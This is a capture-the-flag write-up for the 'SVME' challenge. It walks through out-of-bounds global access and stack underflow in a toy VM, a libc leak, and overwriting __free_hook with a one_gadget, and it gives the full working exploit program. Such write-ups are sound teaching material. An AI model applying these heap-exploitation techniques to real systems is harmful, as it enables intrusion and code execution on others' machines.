SVME

NoobHacker

Description

Professor Terence Parr has taught us how to build a virtual machine. Now it’s time to break it!

nc 47.243.140.252 1337

Link: https://www.slideshare.net/parrt/how-to-build-a-virtual-machine
Attachment: https://realworldctf-attachment.oss-accelerate.aliyuncs.com/svme_9495bfd34dcaea7af748f1138d5fc25e.tar.gz

Score: 67
Tags: Clone-and-Pwn, Virtual Machine
Difficulty: baby
Solves: 93

Solve

Initial analysis

The attachment given contains the following:

.
├── docker
│ ├── Dockerfile
│ └── main.c
├── libc-2.31.so
└── svme

The binary svme is running on the server, and we have to exploit it. The following is the code for main.c:

#include <stdbool.h>
#include <unistd.h>
#include "vm.h"

int main(int argc, char *argv[]) {
    int code[128], nread = 0;
    while (nread < sizeof(code)) {
        int ret = read(0, code+nread, sizeof(code)-nread);
        if (ret <= 0) break;
        nread += ret;
    }
    VM *vm = vm_create(code, nread/4, 0);
    vm_exec(vm, 0, true);
    vm_free(vm);
    return 0;
}

The program reads up to 128*4 bytes and calls VM-related functions declared in “vm.h”, which is not provided to us. Censored1375 from our team found this GitHub repository, which contains the source code for those functions.

With some help from 0xBlue, we finally figured out how to run the different instructions. The VM expects every opcode and every operand to be a 4-byte integer, so the 512-byte buffer holds at most 128 words in total. A program that uses operands therefore fits fewer than 128 instructions. We created the following compile.py script to convert instructions to opcodes that can be fed directly to the program:

#!/usr/bin/env python3
from pwn import *
import struct

vm_instructions = [
    [ "noop",   0 ],
    [ "iadd",   0 ],
    [ "isub",   0 ],
    [ "imul",   0 ],
    [ "ilt",    0 ],
    [ "ieq",    0 ],
    [ "br",     1 ],
    [ "brt",    1 ],
    [ "brf",    1 ],
    [ "iconst", 1 ],
    [ "load",   1 ],
    [ "gload",  1 ],
    [ "store",  1 ],
    [ "gstore", 1 ],
    [ "print",  0 ],
    [ "pop",    0 ],
    [ "call",   3 ],
    [ "ret",    0 ],
    [ "halt",   0 ]
]

with open('instructions', 'r') as f:
    code = f.read().lower().strip()

with open('opcodes-compiled', 'wb') as f:
    for line in code.split('\n'):
        line = line.strip()
        # skip blank lines and comments
        if not line or line.startswith('#'):
            continue
        fields = [field.strip() for field in line.split(',')]
        for opcode, instr in enumerate(vm_instructions):
            # exact match: a prefix test would let "br" swallow "brt" and "brf"
            if fields[0] == instr[0]:
                f.write(p32(opcode))
                for operand in fields[1:]:
                    f.write(int(operand).to_bytes(4, 'little', signed=True))
                break

instructions file:

ICONST,16
PRINT
HALT

output:

$ ./compile.py
$ ./svme < opcodes-compiled
0000:  iconst    16        stack=[ 16 ]
0002:  print               16
stack=[ ]
Data memory:
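
As a cross-check on the encoding, the three-line program above should compile to four little-endian 32-bit words. The sketch below builds them with the standard library only. The opcode numbers are taken from the position of each mnemonic in vm_instructions, and the helper name encode is made up for illustration.

```python
import struct

# Opcode numbers follow the index of each mnemonic in vm_instructions.
ICONST, PRINT, HALT = 9, 14, 18

def encode(words):
    """Pack a list of ints as little-endian signed 32-bit words."""
    return struct.pack('<%di' % len(words), *words)

# ICONST,16 / PRINT / HALT -> opcode, operand, opcode, opcode
program = encode([ICONST, 16, PRINT, HALT])
print(program.hex())
```

Comparing this against a hexdump of opcodes-compiled is a quick way to catch a mis-assembled mnemonic before sending anything to the server.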

Vulnerabilities

On digging into the source code, we see two main vulnerabilities:

  1. In the file “vm.c”, the code responsible for reading and writing global variables does not check the index, so we can read/write out of bounds on the heap.
    case GLOAD: // load from global memory
        addr = vm->code[ip++];
        vm->stack[++sp] = vm->globals[addr];
        break;
    case GSTORE:
        addr = vm->code[ip++];
        vm->globals[addr] = vm->stack[sp--];
        break;
  2. There are no checks for the stack pointer variable (sp), so we can underflow the stack and read/write other things on the heap.

State of the heap

[Image: state of the heap]

The VM struct begins at 0x5555555592a0. Its first qword is the code pointer, which points into the process stack, where our input resides. The dword after that pointer contains the number of instruction words read. The third qword from the start is the pointer to the globals, which is just another chunk on the heap, located at &vm_struct+0x2100. The dword that follows is nglobals, the number of global variables, which the program sets to 0.
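
Because globals is an int array, a negative index walks backwards from the globals chunk in 4-byte steps. A small sketch of that arithmetic, using only the 0x2100 distance stated above (the function name globals_index is hypothetical):

```python
INT_SIZE = 4              # sizeof(int) on x86-64
GLOBALS_OFFSET = 0x2100   # globals chunk sits at &vm_struct + 0x2100

def globals_index(field_offset):
    """globals[] index that aliases the VM struct field at field_offset bytes."""
    return (field_offset - GLOBALS_OFFSET) // INT_SIZE

code_ptr_low = globals_index(0)    # low dword of the code pointer
code_ptr_high = globals_index(4)   # high dword of the code pointer
print(code_ptr_low, code_ptr_high)
```

These are the two indices the exploit passes to GLOAD to read the stack address.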

Exploitation

At this point we can write anywhere on the heap, and I was stuck at this part for a very long time, not realizing we can also read/write to the stack. How?

We already have a pointer to the stack (the code pointer at the start of the VM struct), so we can overwrite the globals pointer with it and then read from and write to the process stack using the GLOAD and GSTORE instructions.

# lower bytes of stack addr
GLOAD,-2112
STORE,0
# higher bytes of stack addr
GLOAD,-2111
STORE,1

# reach the heap addr
POP
POP
POP
# load lower bytes
LOAD,0
# load higher bytes
LOAD,1
# now the globals ptr is same as the code ptr
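
To see why three POPs followed by two LOADs land exactly on the globals pointer, it helps to trace sp. The sketch below is a simplified model and rests on two assumptions drawn from the public VM source rather than from the binary itself: sp starts at -1, and the operand stack array sits directly after nglobals, so stack[-1], stack[-2] and stack[-3] alias nglobals and the high and low dwords of the globals pointer.

```python
# Net effect of each opcode on sp (operands do not matter for this trace).
SP_DELTA = {'GLOAD': +1, 'LOAD': +1, 'STORE': -1, 'POP': -1}

# Assumed aliases for negative stack slots (struct layout is an assumption).
ALIASES = {
    -1: 'nglobals',
    -2: 'globals ptr (high dword)',
    -3: 'globals ptr (low dword)',
}

def trace(program, sp=-1):
    """Return (opcode, slot written) for every push in the program."""
    writes = []
    for op in program:
        sp += SP_DELTA[op]
        if SP_DELTA[op] > 0:  # a push writes stack[sp] after the increment
            writes.append((op, ALIASES.get(sp, 'stack[%d]' % sp)))
    return writes

snippet = ['GLOAD', 'STORE', 'GLOAD', 'STORE',
           'POP', 'POP', 'POP', 'LOAD', 'LOAD']
for op, slot in trace(snippet):
    print(op, '->', slot)
```

Under those assumptions the two GLOADs write to stack[0], and the final two LOADs overwrite the low and then the high dword of the globals pointer.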

Now we have 2 options:

  1. We can overwrite the return address of main, but for that we would have to restore the original globals pointer afterwards so that free does not abort.
  2. Overwrite __free_hook in libc.

I went with option 2, though option 1 should work as well.

Getting a libc leak

To get a libc leak, we can just read the return address of main. main is called by __libc_start_main, so its return address points back into that function, which lives in libc.

To find the correct offset, find the address where main's return address is stored and subtract the stack pointer (the code pointer) from it. To locate the return address, I used the canary command of pwndbg, examined the memory near each canary it found, and picked out the correct address.

[Image: calculating offset]

Thus the return address is reachable through the globals at indices 134 (lower 4 bytes) and 135 (upper 4 bytes). The following code loads that address, adds the offset needed to reach __free_hook, and stores the result.

You can get the offset of __free_hook using pwntools.

# this gives address of `__libc_start_main+243`, the return addr of main
# lsb
GLOAD,134
# add to get to `__free_hook`
ICONST,1866357
IADD
STORE,0
# msb
GLOAD,135
STORE,1
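
The ICONST operand is simply the distance from main's return address to __free_hook, and the VM can only add it to the lower 4 bytes. The sketch below reproduces that arithmetic. FREE_HOOK_OFFSET and DELTA come from the exploit itself, while LIBC_BASE is a made-up example address and add_low_dword is a hypothetical helper that mimics the 32-bit IADD.

```python
FREE_HOOK_OFFSET = 2026280   # __free_hook offset quoted in the exploit comments
# (with pwntools this would be ELF('./libc-2.31.so').symbols['__free_hook'])
DELTA = 1866357              # operand of ICONST in the snippet above
RET_OFFSET = FREE_HOOK_OFFSET - DELTA   # implied offset of __libc_start_main+243

def add_low_dword(addr, delta):
    """Add delta to the low 32 bits only, leaving the high 32 bits untouched."""
    low = ((addr & 0xffffffff) + delta) & 0xffffffff
    high = addr >> 32
    return (high << 32) | low

LIBC_BASE = 0x7ffff7dc3000   # hypothetical base, for illustration only
leaked = LIBC_BASE + RET_OFFSET
free_hook = add_low_dword(leaked, DELTA)
print(hex(RET_OFFSET), hex(free_hook))
```

One caveat of working on halves: if the addition carries out of the lower 4 bytes, the upper half would also need adjusting. The exploit ignores this, which only fails for a small fraction of ASLR layouts.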

Get access to free hook

Now we can overwrite the globals pointer so that it points to __free_hook. After that, the globals instructions let us write the address of a one_gadget to __free_hook.

# reach to the globals ptr
POP
POP
# overwrite the globals ptr to address of `__free_hook`
# lsb
LOAD,0
# msb
LOAD,1

Overwrite free hook

The following code now overwrites free hook:

# lsb
LOAD,0
# one_gadgets: 0xe6c7e, 0xe6c81, 0xe6c84
# 2026280 (offset of `__free_hook`) - 945281 (one_gadget 0xe6c81) = 1080999
# sub to get addr of one_gadget
ICONST,1080999
ISUB
GSTORE,0
# msb
LOAD,1
GSTORE,1
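
The ICONST operand used with ISUB is the distance between __free_hook and the chosen one_gadget. A short sketch of that calculation for all three candidates listed in the comments (the variable names are illustrative):

```python
FREE_HOOK_OFFSET = 2026280                  # from the exploit comments
ONE_GADGETS = [0xe6c7e, 0xe6c81, 0xe6c84]   # candidates from the exploit comments

# Value to subtract from the address of __free_hook to reach each gadget.
deltas = {gadget: FREE_HOOK_OFFSET - gadget for gadget in ONE_GADGETS}

for gadget, delta in deltas.items():
    print(hex(gadget), delta)
```

The exploit uses 1080999, which corresponds to the gadget at 0xe6c81. Swapping in one of the other two deltas is the first thing to try if that gadget's constraints are not met.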

Segfault?

If you run the above code, you will most likely get a segfault. Why?
Along the way, nglobals has been overwritten with a non-zero value, so `vm_print_data` starts printing that many global variables, that is, the data after __free_hook. If the read runs past the end of the mapped memory, it causes a segmentation fault. To avoid this, we set nglobals back to 0.

# set nglobals to 0 so `vm_print_data` does not interfere
ICONST,0
HALT
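
To get a feel for how far the dump would run without this fix, here is a rough estimate. It assumes that nglobals ends up holding the upper 4 bytes of a libc address (a typical value such as 0x7fff is used purely as an example) and that each global is printed as one 4-byte int.

```python
INT_SIZE = 4

def dump_span(nglobals):
    """Bytes that a dump of nglobals ints would read past the globals pointer."""
    return nglobals * INT_SIZE

example_nglobals = 0x7fff   # hypothetical upper half of a libc address
print(dump_span(example_nglobals))
```

That is roughly 128 KiB read starting at __free_hook, which can easily run beyond the writable part of libc into unmapped memory.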

Running the exploit

[Image: exploit]

Full exploit

# lower bytes of stack addr
GLOAD,-2112
STORE,0
# higher bytes of stack addr
GLOAD,-2111
STORE,1

# reach the heap addr
POP
POP
POP
# load lower bytes
LOAD,0
# load higher bytes
LOAD,1
# now the globals ptr is same as the code ptr
# this gives address of `__libc_start_main+243`, the return addr of main
# lsb
GLOAD,134
# add to get to `__free_hook`
ICONST,1866357
IADD
STORE,0
# msb
GLOAD,135
STORE,1

# reach to the globals ptr
POP
POP
# overwrite the globals ptr to address of `__free_hook`
# lsb
LOAD,0
# msb
LOAD,1
# now we can overwrite free hook with globals instructions
# lsb
LOAD,0
# one_gadgets: 0xe6c7e, 0xe6c81, 0xe6c84
# 2026280 (offset of `__free_hook`) - 945281 (one_gadget 0xe6c81) = 1080999
# sub to get addr of one_gadget
ICONST,1080999
ISUB
GSTORE,0
# msb
LOAD,1
GSTORE,1

# set nglobals to 0 so `vm_print_data` does not interfere
ICONST,0
HALT